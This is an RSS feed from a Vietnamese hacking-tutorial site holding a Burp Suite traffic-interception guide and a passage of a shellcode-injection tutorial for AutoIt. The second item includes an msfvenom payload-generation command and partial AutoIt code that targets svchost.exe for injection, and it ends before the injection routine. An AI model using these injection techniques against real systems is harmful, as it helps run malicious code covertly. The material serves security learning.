<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>Basic Hacking &#8211; AnonyViet</title>
	<atom:link href="https://anonyviet.com/category/security/basic-hacking/feed/" rel="self" type="application/rss+xml" />
	<link>https://anonyviet.com</link>
	<description>Webiste chia sẻ kiến thức công nghệ thông tin, mạng máy tính, bảo mật phổ biến nhất Việt Nam. Luôn cập nhật tin tức, thủ thuật nóng hổi nhất</description>
	<lastBuildDate>Tue, 10 Mar 2026 01:04:23 +0000</lastBuildDate>
	<language>vi</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	

<image>
	<url>https://anonyviet.com/wp-content/uploads/2018/10/cropped-ico-logo-75x75.png</url>
	<title>Basic Hacking &#8211; AnonyViet</title>
	<link>https://anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS</title>
		<link>https://anonyviet.com/chan-luu-luong-burp-suite/</link>
					<comments>https://anonyviet.com/chan-luu-luong-burp-suite/#respond</comments>
		
		<dc:creator><![CDATA[Dark Sniffer]]></dc:creator>
		<pubDate>Fri, 17 Apr 2026 21:38:47 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[Burp Suite]]></category>
		<category><![CDATA[lưu lượng]]></category>
		<category><![CDATA[request]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=33989</guid>

					<description><![CDATA[Quick Answer: Để chặn lưu lượng HTTP/HTTPS bằng Burp Suite, bạn cần cài Burp, cấu hình trình duyệt sử dụng proxy 127.0.0.1:8080, sau đó cài chứng chỉ Burp CA vào trình duyệt. Khi bật tính năng Intercept, mọi request từ trình duyệt sẽ đi qua Burp trước khi tới máy chủ, cho phép bạn xem [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><strong>Quick Answer:</strong> Để chặn lưu lượng HTTP/HTTPS bằng <strong>Burp Suite</strong>, bạn cần cài Burp, cấu hình trình duyệt sử dụng proxy <strong>127.0.0.1:8080</strong>, sau đó cài chứng chỉ <strong>Burp CA</strong> vào trình duyệt. Khi bật tính năng <strong>Intercept</strong>, mọi request từ trình duyệt sẽ đi qua Burp trước khi tới máy chủ, cho phép bạn xem và chỉnh sửa dữ liệu.</p>
<p>Khi làm việc với <strong>Web Security</strong>, việc quan sát và chỉnh sửa request HTTP là kỹ năng cực kỳ quan trọng. Đây là cách mà các chuyên gia bảo mật phát hiện lỗ hổng như <em>SQL Injection, XSS, Authentication Bypass</em> hoặc debug API.</p>
<p>Một trong những công cụ phổ biến nhất hiện nay là <strong>Burp Suite</strong> – bộ công cụ kiểm thử bảo mật web do <strong>PortSwigger</strong> phát triển.</p>
<p>Trong bài viết này, AnonyViet sẽ hướng dẫn bạn cách thiết lập Burp Suite để:</p>
<ul>
<li>Chặn toàn bộ lưu lượng web từ trình duyệt</li>
<li>Phân tích request/response HTTP</li>
<li>Giải mã lưu lượng HTTPS bằng TLS Certificate</li>
</ul>
<p><img fetchpriority="high" decoding="async" class="aligncenter wp-image-34004 size-full" src="https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard.jpg" alt="Cách chặn lưu lượng từ máy chủ bằng Burp Suite" width="901" height="452" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 16" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard.jpg 400w, https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard-300x150.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard-768x385.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard-360x180.jpg 360w, https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard-750x376.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/burpsuite-twittercard-120x60.jpg 120w" sizes="(max-width: 901px) 100vw, 901px" /></p>
<h2>Burp Suite là gì?</h2>
<p><strong>Burp Suite</strong> (thường gọi tắt là <strong>Burp</strong>) là một công cụ đồ họa giúp kiểm tra bảo mật ứng dụng Web.</p>
<p>Nó hoạt động như một <strong>proxy trung gian (MITM – Man in the Middle)</strong> giữa trình duyệt và máy chủ. Khi request đi qua Burp, bạn có thể:</p>
<ul>
<li>Xem toàn bộ request HTTP</li>
<li>Chỉnh sửa tham số</li>
<li>Phân tích header</li>
<li>Replay request</li>
<li>Kiểm thử bảo mật API</li>
</ul>
<p>Burp Suite có nhiều phiên bản:</p>
<ul>
<li><strong>Community Edition</strong> – miễn phí</li>
<li><strong>Professional</strong> – dành cho pentester</li>
<li><strong>Enterprise</strong> – kiểm thử bảo mật quy mô lớn</li>
</ul>
<p>Bài viết này sử dụng phiên bản <strong>Community Edition</strong>.</p>
<h2>Những gì chúng ta sẽ thực hiện</h2>
<p>Để chặn lưu lượng bằng Burp Suite, bạn sẽ thực hiện 3 bước chính:</p>
<ol>
<li>Tải và cài đặt Burp Suite</li>
<li>Cấu hình trình duyệt sử dụng proxy của Burp</li>
<li>Cài đặt chứng chỉ TLS để chặn HTTPS</li>
</ol>
<h2>Bước 1: Tải và cài đặt Burp Suite</h2>
<p>Bạn có thể tải Burp Suite Community tại trang chính thức của PortSwigger:</p>
<p><a href="https://portswigger.net/burp/communitydownload" target="_blank" rel="noopener">https://portswigger.net/burp/communitydownload</a></p>
<p>Lưu ý:</p>
<ul>
<li>Burp Suite yêu cầu <strong>Java Runtime</strong></li>
<li>Hỗ trợ Windows, Linux và macOS</li>
</ul>
<p>Sau khi cài đặt và mở Burp Suite, bạn sẽ thấy giao diện khởi tạo dự án:</p>
<p><img decoding="async" class="size-full wp-image-33990 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-1.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 15" width="722" height="464" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 17" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-1.jpg 722w, https://anonyviet.com/wp-content/uploads/2021/09/burp-1-300x193.jpg 300w" sizes="(max-width: 722px) 100vw, 722px" /></p>
<p>Nếu không muốn lưu project:</p>
<ul>
<li>Nhấn <strong>Next</strong></li>
<li>Sau đó chọn <strong>Start Burp</strong></li>
</ul>
<p><img decoding="async" class="size-full wp-image-33991 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-2.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 16" width="711" height="453" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 18" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-2.jpg 711w, https://anonyviet.com/wp-content/uploads/2021/09/burp-2-300x191.jpg 300w" sizes="(max-width: 711px) 100vw, 711px" /></p>
<p>Giao diện chính của Burp Suite sẽ xuất hiện:</p>
<p><img decoding="async" class="size-full wp-image-33992 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-3.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 17" width="1085" height="539" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 19" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-3.jpg 1085w, https://anonyviet.com/wp-content/uploads/2021/09/burp-3-300x149.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/burp-3-1024x509.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/burp-3-768x382.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/burp-3-360x180.jpg 360w, https://anonyviet.com/wp-content/uploads/2021/09/burp-3-750x373.jpg 750w" sizes="(max-width: 1085px) 100vw, 1085px" /></p>
<h2>Bước 2: Cấu hình Proxy cho trình duyệt</h2>
<p>Để Burp có thể chặn request, trình duyệt phải gửi lưu lượng thông qua proxy của Burp.</p>
<p>Trong ví dụ này mình sử dụng <strong>Firefox</strong>.</p>
<p>Mở cài đặt:</p>
<p><strong>about:preferences#general</strong></p>
<p>Cuộn xuống phần <strong>Network Settings</strong> và nhấn <strong>Settings</strong>.</p>
<p><img decoding="async" class="size-full wp-image-33993 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-4.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 18" width="512" height="607" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 20" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-4.jpg 512w, https://anonyviet.com/wp-content/uploads/2021/09/burp-4-253x300.jpg 253w" sizes="(max-width: 512px) 100vw, 512px" /></p>
<p>Thiết lập proxy như sau:</p>
<ul>
<li><strong>Manual proxy configuration</strong></li>
<li>HTTP Proxy: <strong>127.0.0.1</strong></li>
<li>Port: <strong>8080</strong></li>
<li>Tick <strong>Use this proxy for all protocols</strong></li>
</ul>
<p>Sau đó nhấn <strong>OK</strong>.</p>
<p>Lúc này toàn bộ lưu lượng trình duyệt sẽ đi qua Burp.</p>
<h2>Kiểm tra Proxy Listener của Burp</h2>
<p>Mở Burp Suite:</p>
<ul>
<li>Proxy → Options</li>
</ul>
<p><img decoding="async" class="size-full wp-image-33994 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-5.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 19" width="612" height="321" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 21" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-5.jpg 612w, https://anonyviet.com/wp-content/uploads/2021/09/burp-5-300x157.jpg 300w" sizes="(max-width: 612px) 100vw, 612px" /></p>
<p>Đảm bảo Proxy Listener đang:</p>
<ul>
<li>Host: <strong>127.0.0.1</strong></li>
<li>Port: <strong>8080</strong></li>
<li>Trạng thái: <strong>Running</strong></li>
</ul>
<h2>Test chặn lưu lượng HTTP</h2>
<p>Truy cập trang HTTP đơn giản:</p>
<p><strong>http://neverssl.com</strong></p>
<p>Burp sẽ chặn request và hiển thị tại tab <strong>Intercept</strong>.</p>
<p><img decoding="async" class="size-full wp-image-33995 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-6.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 20" width="572" height="252" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 22" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-6.jpg 572w, https://anonyviet.com/wp-content/uploads/2021/09/burp-6-300x132.jpg 300w" sizes="(max-width: 572px) 100vw, 572px" /></p>
<p>Bạn có thể:</p>
<ul>
<li>Xem header</li>
<li>Sửa tham số</li>
<li>Forward request</li>
<li>Drop request</li>
</ul>
<h2>Tại sao HTTPS bị lỗi TLS?</h2>
<p>Khi truy cập trang HTTPS như:</p>
<p><strong>https://google.com</strong></p>
<p>Bạn sẽ thấy lỗi TLS.</p>
<p><img decoding="async" class="size-full wp-image-33996 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-7.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 21" width="657" height="243" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 23" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-7.jpg 657w, https://anonyviet.com/wp-content/uploads/2021/09/burp-7-300x111.jpg 300w" sizes="(max-width: 657px) 100vw, 657px" /></p>
<p>Nguyên nhân:</p>
<ul>
<li>HTTPS mã hóa dữ liệu bằng TLS</li>
<li>Burp đang đứng giữa (MITM)</li>
<li>Trình duyệt không tin chứng chỉ của Burp</li>
</ul>
<p>Do đó chúng ta cần cài chứng chỉ CA của Burp.</p>
<h2>Bước 3: Cài chứng chỉ Burp CA để chặn HTTPS</h2>
<p>Mở trình duyệt và truy cập:</p>
<p><strong>http://burp/</strong></p>
<p>Nhấn <strong>CA Certificate</strong>.</p>
<p><img decoding="async" class="size-full wp-image-33997 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-8.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 22" width="1428" height="329" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 24" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-8.jpg 1428w, https://anonyviet.com/wp-content/uploads/2021/09/burp-8-300x69.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/burp-8-1024x236.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/burp-8-768x177.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/burp-8-750x173.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/burp-8-1140x263.jpg 1140w" sizes="(max-width: 1428px) 100vw, 1428px" /></p>
<p>Lưu file chứng chỉ.</p>
<p>Tiếp theo mở:</p>
<p><strong>about:preferences</strong></p>
<p>Tìm kiếm <strong>Certificates</strong>.</p>
<p><img decoding="async" class="size-full wp-image-33998 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/burp-9.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 23" width="697" height="248" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 25" srcset="https://anonyviet.com/wp-content/uploads/2021/09/burp-9.jpg 697w, https://anonyviet.com/wp-content/uploads/2021/09/burp-9-300x107.jpg 300w" sizes="(max-width: 697px) 100vw, 697px" /></p>
<p>Chọn:</p>
<ul>
<li>View Certificates</li>
<li>Authorities</li>
<li>Import</li>
</ul>
<p>Chọn file chứng chỉ Burp vừa tải.</p>
<p><img decoding="async" class="size-full wp-image-33999 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/nurp-10.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 24" width="648" height="344" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 26" srcset="https://anonyviet.com/wp-content/uploads/2021/09/nurp-10.jpg 648w, https://anonyviet.com/wp-content/uploads/2021/09/nurp-10-300x159.jpg 300w" sizes="(max-width: 648px) 100vw, 648px" /></p>
<p>Tick cả hai tùy chọn:</p>
<ul>
<li>Trust this CA to identify websites</li>
<li>Trust this CA to identify email users</li>
</ul>
<p>Nhấn <strong>OK</strong>.</p>
<p>Bây giờ bạn có thể chặn HTTPS mà không bị lỗi TLS.</p>
<h2>Cách Burp Suite chặn request</h2>
<p>Mở:</p>
<p><strong>Proxy → Intercept</strong></p>
<p><img decoding="async" class="size-full wp-image-34000 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/new-b-1.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 25" width="1440" height="810" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 27" srcset="https://anonyviet.com/wp-content/uploads/2021/09/new-b-1.jpg 1440w, https://anonyviet.com/wp-content/uploads/2021/09/new-b-1-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/new-b-1-1024x576.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/new-b-1-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/new-b-1-750x422.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/new-b-1-1140x641.jpg 1140w" sizes="(max-width: 1440px) 100vw, 1440px" /></p>
<p>Khi bật <strong>Intercept is ON</strong>:</p>
<ul>
<li>Request dừng lại tại Burp</li>
<li>Bạn có thể chỉnh sửa dữ liệu</li>
<li>Sau đó nhấn <strong>Forward</strong></li>
</ul>
<p>Ví dụ khi đăng nhập một website:</p>
<p><img decoding="async" class="size-full wp-image-34001 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 26" width="1440" height="810" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 28" srcset="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2.jpg 1440w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2-1024x576.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2-750x422.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-2-1140x641.jpg 1140w" sizes="(max-width: 1440px) 100vw, 1440px" /></p>
<p>Bạn sẽ thấy:</p>
<ul>
<li>HTTP headers</li>
<li>Cookie</li>
<li>POST data</li>
<li>Token</li>
</ul>
<h3>Chỉnh sửa tham số request</h3>
<p>Chuyển sang tab <strong>Params</strong>.</p>
<p><img decoding="async" class="size-full wp-image-34002 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 27" width="1440" height="810" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 29" srcset="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3.jpg 1440w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3-1024x576.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3-750x422.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-3-1140x641.jpg 1140w" sizes="(max-width: 1440px) 100vw, 1440px" /></p>
<p>Tại đây bạn có thể:</p>
<ul>
<li>Sửa value</li>
<li>Thêm tham số</li>
<li>Xóa tham số</li>
</ul>
<p>Đây là cách pentester kiểm tra logic của server.</p>
<h2>Xem toàn bộ lịch sử request</h2>
<p>Để xem tất cả request:</p>
<p><strong>Proxy → HTTP History</strong></p>
<p><img decoding="async" class="size-full wp-image-34003 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5.jpg" alt="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 28" width="1440" height="810" title="Cách chặn lưu lượng bằng Burp Suite để phân tích HTTP/HTTPS 30" srcset="https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5.jpg 1440w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5-300x169.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5-1024x576.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5-768x432.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5-750x422.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/09/new-burp-5-1140x641.jpg 1140w" sizes="(max-width: 1440px) 100vw, 1440px" /></p>
<p>Bạn sẽ thấy:</p>
<ul>
<li>Danh sách request</li>
<li>Status code</li>
<li>Domain</li>
<li>Method (GET/POST)</li>
</ul>
<p>Rất hữu ích khi phân tích API hoặc debug web app.</p>
<h2>Use-case thực tế tại Việt Nam</h2>
<p>Burp Suite thường được dùng để:</p>
<ul>
<li>Phân tích API mobile app</li>
<li>Debug request của website</li>
<li>Reverse engineer web service</li>
<li>Kiểm thử bảo mật web</li>
</ul>
<p>Nhiều bạn học <strong>Bug Bounty</strong> hoặc <strong>Web Pentest</strong> đều bắt đầu với Burp.</p>
<p>Nếu bạn mới học bảo mật web, nên kết hợp với nền tảng thực hành như:</p>
<ul>
<li>TryHackMe</li>
<li>PortSwigger Web Security Academy</li>
</ul>
<h2>Lỗi thường gặp khi dùng Burp Suite</h2>
<h3>1. Không chặn được request</h3>
<p>Nguyên nhân thường do:</p>
<ul>
<li>Proxy chưa cấu hình đúng</li>
<li>Port sai</li>
<li>Listener không chạy</li>
</ul>
<h3>2. HTTPS bị lỗi TLS</h3>
<p>Chưa cài chứng chỉ Burp CA vào trình duyệt.</p>
<h3>3. Website không tải</h3>
<p>Do Intercept đang bật nhưng bạn chưa Forward request.</p>
<h2>FAQ – Câu hỏi thường gặp</h2>
<h3>Burp Suite có miễn phí không?</h3>
<p>Có. Burp Suite Community Edition miễn phí nhưng một số tính năng nâng cao chỉ có trong bản Professional.</p>
<h3>Burp Suite có dùng để hack không?</h3>
<p>Burp Suite là công cụ kiểm thử bảo mật hợp pháp. Nó được dùng bởi pentester và chuyên gia bảo mật để phát hiện lỗ hổng.</p>
<h3>Có cần Java để chạy Burp Suite không?</h3>
<p>Các phiên bản mới đã tích hợp runtime, tuy nhiên một số bản cũ vẫn yêu cầu Java.</p>
<h3>Nên dùng trình duyệt nào với Burp?</h3>
<p>Firefox thường được sử dụng vì dễ cấu hình proxy và certificate.</p>
<h2>Checklist thiết lập Burp Suite</h2>
<ul>
<li>Cài Burp Suite Community</li>
<li>Cấu hình proxy 127.0.0.1:8080</li>
<li>Kiểm tra Proxy Listener</li>
<li>Tải chứng chỉ Burp CA</li>
<li>Import vào Firefox</li>
<li>Bật Intercept</li>
<li>Phân tích request/response</li>
</ul>
<h2>Kết luận</h2>
<p><strong>Burp Suite</strong> là một công cụ cực kỳ quan trọng trong lĩnh vực <strong>Web Security</strong>. Việc biết cách chặn và phân tích lưu lượng HTTP/HTTPS giúp bạn hiểu rõ cách ứng dụng web hoạt động và phát hiện các vấn đề bảo mật.</p>
<p>Nếu bạn đang học <strong>Pentest</strong>, <strong>Bug Bounty</strong> hoặc phân tích API, việc thành thạo Burp Suite là kỹ năng gần như bắt buộc.</p>
<p>Trong các bài viết tiếp theo, AnonyViet sẽ hướng dẫn thêm về:</p>
<ul>
<li>Repeater</li>
<li>Intruder</li>
<li>Burp automation</li>
<li>Khai thác lỗ hổng web thực tế</li>
</ul>
<h2>Nguồn tham khảo</h2>
<ul>
<li>PortSwigger Web Security Academy</li>
<li>TryHackMe</li>
<li>Tài liệu Burp Suite Official</li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>https://anonyviet.com/chan-luu-luong-burp-suite/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit</title>
		<link>https://anonyviet.com/cach-thuc-hien-ki-thuat-tan-cong-shellcode-injection-voi-autoit/</link>
					<comments>https://anonyviet.com/cach-thuc-hien-ki-thuat-tan-cong-shellcode-injection-voi-autoit/#comments</comments>
		
		<dc:creator><![CDATA[Thanh Kim]]></dc:creator>
		<pubDate>Sat, 08 Mar 2025 07:19:39 +0000</pubDate>
				<category><![CDATA[Basic Hacking]]></category>
		<category><![CDATA[autoit]]></category>
		<category><![CDATA[Shellcode]]></category>
		<category><![CDATA[Shellcode Injection]]></category>
		<guid isPermaLink="false">https://anonyviet.com/?p=82398</guid>

					<description><![CDATA[Việc hiểu rõ các kỹ thuật tấn công là một phần quan trọng để phát triển các biện pháp phòng thủ hiệu quả. Một trong những phương pháp tấn công nổi bật là Shellcode Injection, cho phép hacker chèn mã độc trực tiếp vào bộ nhớ của chương trình đang chạy để thực thi các [&#8230;]]]></description>
										<content:encoded><![CDATA[<p>Việc hiểu rõ các kỹ thuật tấn công là một phần quan trọng để phát triển các biện pháp phòng thủ hiệu quả. Một trong những phương pháp tấn công nổi bật là <strong>Shellcode Injection</strong>, cho phép hacker chèn mã độc trực tiếp vào bộ nhớ của chương trình đang chạy để thực thi các lệnh độc hại. Kết hợp với AutoIt là một ngôn lập trình dễ sử dụng làm cho kỹ thuật này trở nên linh hoạt và nguy hiểm hơn bao giờ hết.</p>
<p>Trong bài viết này, chúng ta sẽ cùng khám phá cách thực hiện kỹ thuật Shellcode Injection với AutoIt, từ những khái niệm cơ bản đến các bước thực hành cụ thể, nhằm giúp bạn hiểu sâu hơn về cách thức hoạt động của nó</p>
<p><strong>Lưu ý:</strong> Bài viết này chỉ dành cho mục đích giáo dục, nghiên cứu và học tập. Anonyviet không chịu trách nhiệm trước mọi hành vi bất hợp pháp</p>
<h2><strong>Shellcode Injection là gì ?</strong></h2>
<p>Trước khi đi vào chi tiết, hãy cùng tìm hiểu khái niệm cơ bản. Shellcode là một đoạn mã nhị phân nhỏ, thường được viết bằng ngôn ngữ Assembly, nhằm mục đích thực thi một tác vụ cụ thể (như mở shell, tải phần mềm độc hại,…). Shellcode Injection là quá trình chèn đoạn mã này vào bộ nhớ của một tiến trình đang chạy, sau đó buộc tiến trình đó thực thi mã.</p>
<p>Với khả năng thao tác bộ nhớ và gọi các hàm API của Windows, Autoit là ngôn ngữ lập trình lý tưởng để thực hiện kỹ thuật này. Chúng ta sẽ tận dụng các hàm có sẵn trong các thư viện của Autoit để tương tác với hệ thống</p>
<h2><strong>Cách thực hiện kĩ thuật Shellcode Injection</strong></h2>
<h3><strong>1. Chuẩn bị môi trường</strong></h3>
<p>Để bắt đầu, bạn cần chuẩn bị những thứ sau:</p>
<ul>
<li><strong>Tải và cài đặt<a href="https://www.autoitscript.com/site/autoit/downloads/" rel="noopener"> AutoIt:</a></strong> Đảm bảo bạn có cả trình soạn thảo SciTE để viết code</li>
<li><strong>Shellcode:</strong> Bạn có thể tạo shellcode bằng các công cụ như Metasploit (msfvenom) hoặc tự viết bằng Assembly. Ví dụ, dùng lệnh sau trong Metasploit để tạo shellcode mở calculator</li>
</ul>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">msfvenom -p windows/x64/exec CMD=calc.exe -f hex</pre>
<p>Kết quả sẽ là một chuỗi hex như: fc4883e4&#8230;32e65786500</p>
<ul>
<li><strong>Kiến thức cơ bản:</strong> Hiểu về hàm API Windows như VirtualAlloc, RtlMoveMemory, và CreateThread</li>
</ul>
<h3><strong>2. Viết code Autoit thực hiện kĩ thuật Shellcode Injection</strong></h3>
<h4><strong>Phần khai báo thư viện</strong></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">#include &lt;Process.au3&gt;
#include &lt;Memory.au3&gt;
#include &lt;WinAPI.au3&gt;
#include &lt;Array.au3&gt;</pre>
<p><code></code><code></code><code></code><code></code>Đây là các thư viện (library) mà AutoIt sử dụng để cung cấp các hàm hỗ trợ:</p>
<ul>
<li>&lt;Process.au3&gt;: Hỗ trợ làm việc với tiến trình (process), như lấy tên, kiểm tra PID.</li>
<li>&lt;Memory.au3&gt;: Cung cấp hàm để thao tác bộ nhớ, như cấp phát hoặc ghi dữ liệu.</li>
<li>&lt;WinAPI.au3&gt;: Cho phép gọi các hàm API của Windows (như OpenProcess, WriteProcessMemory).</li>
<li>&lt;Array.au3&gt;: Hỗ trợ làm việc với mảng (array), dùng để quản lý danh sách tiến trình.</li>
</ul>
<p>Để dễ hiểu hơn bạn hãy nghĩ đây là những &#8220;cuốn sách hướng dẫn&#8221; mà chương trình cần để biết cách làm việc với hệ điều hành</p>
<h4><strong>Khai báo biến toàn cục</strong></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Global $hexShellcode = "fc4883e4...32e65786500"</pre>
<p>$hexShellcode là shellcode dạng mã hexa (chuỗi số và chữ cái như fc4883e4f). Đây là đoạn mã nhỏ sẽ được tiêm vào tiến trình đích để thực thi</p>
<h4><strong>Gọi các hàm chính</strong></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">_CheckProcess()
_ProcessInjection()</pre>
<p>Hai hàm này chính là &#8220;đầu não&#8221; của chương trình:</p>
<ul>
<li> _CheckProcess(): Kiểm tra xem tiến trình đích (svchost.exe) có đang chạy không</li>
<li> _ProcessInjection(): Thực hiện việc tiêm shellcode vào tiến trình svchost.exe</li>
</ul>
<h4><strong>Hàm _CheckProcess()</strong><code></code><code></code></h4>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">Func _CheckProcess()
    ConsoleWrite("[+] Checking for target process" &amp; @CRLF &amp; @CRLF)

    Global $targetPID = Find_Process("svchost.exe")

    If Not $targetPID = 0 Then
        Global $targetProcName = _ProcessGetName($targetPID)
        ConsoleWrite("[+] Target process is running (" &amp; $targetProcName &amp;")" &amp; @CRLF &amp; @CRLF)
    ElseIf $targetPID = 0 Then
        ConsoleWrite("[!] Target process is not running. Exiting." &amp; @CRLF &amp; @CRLF)
        Exit
    EndIf
EndFunc</pre>
<p>Hàm này kiểm tra xem tiến trình svchost.exe có đang chạy không và lấy mã định danh (PID) của nó</p>
<p>Chi tiết:</p>
<ul>
<li><strong>ConsoleWrite(&#8220;[+] Checking for target process&#8221; &amp; @CRLF &amp; @CRLF):</strong> In thông báo &#8220;Đang kiểm tra tiến trình đích&#8221;</li>
<li><strong>$targetPID = Find_Process(&#8220;svchost.exe&#8221;):</strong> Gọi hàm Find_Process để tìm PID của svchost.exe</li>
<li><strong>If Not $targetPID = 0:</strong> Nếu tìm thấy PID (khác 0):</li>
</ul>
<p>&#8211;<strong> $targetProcName = _ProcessGetName($targetPID):</strong> Lấy tên tiến trình từ PID (dùng thư viện &lt;Process.au3&gt;)</p>
<p>&#8211; In thông báo xác nhận tiến trình đang chạy</p>
<ul>
<li><strong>ElseIf $targetPID = 0:</strong> Nếu không tìm thấy, in thông báo lỗi và thoát chương trình (Exit)</li>
</ul>
<h4><strong>Hàm Find_Process()</strong><code></code><code></code></h4>
